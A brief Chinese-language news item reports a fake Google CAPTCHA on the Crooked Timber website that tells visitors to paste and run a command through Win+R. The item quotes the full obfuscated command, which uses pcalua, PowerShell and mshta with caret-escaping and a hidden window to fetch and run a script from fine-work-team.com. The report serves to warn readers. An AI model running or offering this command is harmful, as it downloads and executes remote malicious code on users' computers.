Folia
← 返回头版

Crooked Timber网站出现伪装验证码的恶意脚本诱导

访问Crooked Timber网站的用户遭遇了一次网络钓鱼攻击1。该恶意页面伪装成Google验证码的形式,试图诱导用户执行含有PowerShell命令的脚本1。

该恶意页面声称需要用户按下Win+R和Ctrl+V组合键来运行命令以验证是否为真人1。其中的PowerShell命令旨在从远程URL(fine-work-team.com)下载并执行恶意脚本,具体命令为"pcalua -a "PowerShell" -c "saps cmd '/v/c m^s^h^t^a h^t^t^p^s^:^/^/fine-work-team.com/6272' -Wi Hi""1。用户及时识别了这一威胁并向大语言模型咨询,后者明确建议不要运行该命令1。


评论